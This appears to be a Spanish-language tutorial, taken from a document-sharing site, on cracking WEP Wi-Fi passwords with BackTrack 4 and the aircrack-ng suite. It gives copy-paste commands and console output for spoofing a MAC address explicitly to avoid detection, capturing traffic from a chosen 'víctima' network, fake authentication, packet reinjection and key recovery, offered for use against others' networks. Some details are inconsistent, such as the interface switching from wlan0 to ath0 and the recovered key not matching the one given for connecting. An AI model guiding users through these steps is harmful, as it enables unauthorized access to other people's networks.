Está en la página 1de 5

BackTrack 4 Wep Por Aarón Estuardo

BackTrack 4

Hardware que yo utilice para realizar el tutorial: COMPAQ hp 530 con una tarjeta inalámbrica Atheros
AR5009 802.11a/g/n

Abre una ventana de terminal (o consola) y escribe lo siguiente: airmon-ng

Este comando te indica cual es tu tarjeta inalámbrica; Algunos de las tarjetas que pueden aparecer son:
wlan0, eth0, eth1, etc.

La interface reconocida en el sistema actual es Wlan0, por lo que ejecutamos

airmon-ng stop Wlan0 esto para deshabilitar la wireless que se encuentra en modo manager:(es decir
normal)

Editamos la Mac:
Ifconfig Wlan0
macchanger –m 00:11:22:33:44:55 Wlan0

(donde pone 00:11:22:33:44:55 esto es MAC STA es decir inventada) se puede usar esta o usar otra
Ifconfig Wlan0 up.

Para levantar el wireless ahora escribe : airmon-ng start wlan0

Nota aparte: Con esto Modificas la configuración de la tarjeta de red inalámbrica para hacerle un cambio
de Mac, este con dos razones importantes:

1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones
2. Vas a necesitar el número de Mac mas adelante y esta es una fácil de escribir y recordar.
En la consola se vería así:
root@bt:~# airmon-ng
Interface Chipset Driver
Puse 2 veces el proceso:
wlan0 Atheros ath9k - [phy0]
root@bt:~# airmon-ng stop wlan0 La primera vez está escrita,
Interface Chipset Driver para que puedan copiar y
pegar y la otra es una
wlan0 Atheros ath9k - [phy0]
(monitor mode disabled)
imagen para que veas cómo
root@bt:~# ifconfig wlan0 quedaría visualmente.
wlan0 Link encap:Ethernet HWaddr 00:23:4d:11:39:e4
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

root@bt:~# ifconfig wlan0 down

root@bt:~# macchanger -m 00:11:22:33:44:55 wlan0


Current MAC: 00:23:4d:11:39:e4 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Atheros ath9k - [phy0]


(monitor mode enabled on mon0)
BackTrack 4 Wep Por Aarón Estuardo

Ahora el Hack

Chequeamos la red para escoger nuestra víctima: airodump-ng wlan0

Después de algunos segundos presionamos Ctrl +C esto detendrá él escaneo y observamos la Redes
que a tacaremos tomamos nota de 3 datos: BSSID, CH, ESSID

Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal), PWR
(Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red,
este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).

Para ver cuales señales nos sirven, hay que ver la columna #/s, esa columna nos indica la cantidad de
datos que la señal está emitiendo.
BackTrack 4 Wep Por Aarón Estuardo

En la consola se vería así:

Ahora empezamos a escanear las redes que se encuentran en ese canal, en este caso canal 6.
Para ello escribimos lo siguiente: airodump-ng –w prueva –c 6 -- bssid 00:21:00:41:16:2E wlan0
BackTrack 4 Wep Por Aarón Estuardo

Donde, -C 6 es en donde se encuentra la señal que vamos a escanear, -w prueva es el archivo que se va
a crear para poder guardar los datos que se capturen y -- bssid 00:21:00:41:16:2E es la Mac de la red
que estés atacando.

Lo que hacemos ahora es empezar a capturar los datos de esta señal, para pasar a la siguiente etapa
minimiza esta ventana (en algunos casos en la versión Live CD se relentiza la velocidad de respuesta del
pc si la ventana esta up mientras esta trabajado).

NOTA: si ves que la DATA va rápido NO es necesario pasar a la fase de AUTENTIFICACION


FALSA, pasa de inmediato a la DECODIFICACION DE LA CLAVE por medio de AIRCRACK, de lo
contrario si no avanza con fluidez, te recomiendo sigas el siguiente paso.

Comenzara a capturar.
Ahora abre otra console segunda ventana abajo ala izquierda y ahora viene el primer ataque, que es el de
autentificación falsa y utilizamos los datos que tomamos anterior mente.

aireplay-ng -1 0 –e Etagta –a 00:21:00:41:16:2E –h 00:11:22:33:44:55 ath0

Etagta es la ESSID nombre de la red, poner la vuestra


00:21:00:41:16:2E es la BSSID es la Mac atacada, poner la correspondiente.
00:11:22:33:44:55 es la MAC STATION es decir Mac falsa o asociada (nota: sí durante la captura
aparece en station una Mac asociada, es decir no la que nosotros hemos creado es aconsejable poner
esa en su lugar)
BackTrack 4 Wep Por Aarón Estuardo

Fijate que aparezca al final Association successful : - ) (AID: 1)


Si no te sale trata de acercarte al AP (punto de acceso) y inténtalo nuevamente hasta que te aparezca.
Es hora de la reinyección de paquetes para hacer más rápido el Ataque

aireplay-ng -3 –b 00:21:00:41:16:2E –h 00:11:22:33:44:55 wlan0

Al hacer esto si todo va bien veremos como en la ventana de la captura de paquetes los DATAS o ivis van
en aumento, y mientras aumentan abrimos una tercera ventana Ponemos el comando:

aircrack-ng prueva-01.cap

Esperamos a que saque la key el proceso puede tardar un par de minutos asique paciencia en ocasiones
avisa que es necesario esperar a tener más ivis, si te sale ese mensaje no hagas nada y espera a que el
aircrack intente nuevamente sacarla, automáticamente ira escaneando hasta encontrar la clave.
La mayoría de las veces aparecen 2 keys una hexadecimal y otra ASCII ambas valen.
Esto depende de la compañía que este habilitando el internet a tu víctima.

Key found 01:74:99:04:41

Para conectarse obviamente la escriben sin colocar los “:” (0007203701)


Errores comunes:

1)confundir los comandos airodump, aireplay, aircrack


2)escribir mal los comandos
3)olvidar poner -ng a los comandos: airodump-ng, aireplay-ng, aircrack-ng
4)poner incorrectamente el nombre de la red de la victima, asi como su mac (se puede copiar y pegar)

Existen mas comandos para hackear weps, estos no son los únicos pero eso ya depende de ti
averiguarlo.

También podría gustarte